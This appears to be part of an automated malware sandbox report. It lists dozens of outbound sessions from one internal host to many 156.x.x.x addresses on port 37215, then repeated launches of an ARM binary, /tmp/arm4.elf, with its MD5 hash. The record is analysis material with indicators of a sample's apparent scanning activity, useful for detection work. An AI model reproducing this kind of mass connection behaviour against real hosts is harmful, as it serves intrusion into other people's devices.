                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29804192.168.2.1545450156.184.146.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29805192.168.2.1543282156.13.171.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29806192.168.2.1549766156.80.22.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29807192.168.2.1536458156.138.125.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29808192.168.2.1541408156.195.92.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29809192.168.2.1542890156.16.243.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29810192.168.2.1558612156.81.54.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29811192.168.2.1543310156.208.177.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29812192.168.2.1553844156.197.140.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29813192.168.2.1559342156.77.123.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29814192.168.2.1537506156.111.214.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29815192.168.2.1546844156.41.199.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29816192.168.2.1546438156.218.212.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29817192.168.2.1552026156.248.113.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29818192.168.2.1552916156.160.22.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29819192.168.2.1536632156.203.224.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29820192.168.2.1552526156.156.219.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29821192.168.2.1552980156.29.198.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29822192.168.2.1544530156.61.188.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29823192.168.2.1559326156.51.93.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29824192.168.2.1538048156.248.173.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29825192.168.2.1546758156.219.144.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29826192.168.2.1543708156.156.89.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29827192.168.2.1545832156.230.118.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29828192.168.2.1552938156.204.218.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29829192.168.2.1547216156.212.65.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29830192.168.2.1549636156.71.230.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29831192.168.2.1553722156.162.14.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29832192.168.2.1544010156.237.88.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29833192.168.2.1558348156.121.227.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29834192.168.2.1534216156.133.14.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29835192.168.2.1556364156.92.251.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29836192.168.2.1546494156.116.164.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29837192.168.2.1542320156.218.103.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29838192.168.2.1555310156.205.186.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29839192.168.2.1539094156.21.212.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29840192.168.2.1554584156.8.195.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29841192.168.2.1533766156.242.162.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29842192.168.2.1544334156.220.53.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29843192.168.2.1545496156.94.137.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            System Behavior

                                                                            Start time (UTC):13:05:02
                                                                            Start date (UTC):08/06/2024
                                                                            Path:/tmp/arm4.elf
                                                                            Arguments:/tmp/arm4.elf
                                                                            File size:4956856 bytes
                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                            Start time (UTC):13:05:02
                                                                            Start date (UTC):08/06/2024
                                                                            Path:/tmp/arm4.elf
                                                                            Arguments:-
                                                                            File size:4956856 bytes
                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                            Start time (UTC):13:05:02
                                                                            Start date (UTC):08/06/2024
                                                                            Path:/tmp/arm4.elf
                                                                            Arguments:-
                                                                            File size:4956856 bytes
                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                            Start time (UTC):13:05:02
                                                                            Start date (UTC):08/06/2024
                                                                            Path:/tmp/arm4.elf
                                                                            Arguments:-
                                                                            File size:4956856 bytes
                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                            Start time (UTC):13:05:03
                                                                            Start date (UTC):08/06/2024
                                                                            Path:/tmp/arm4.elf
                                                                            Arguments:-
                                                                            File size:4956856 bytes
                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1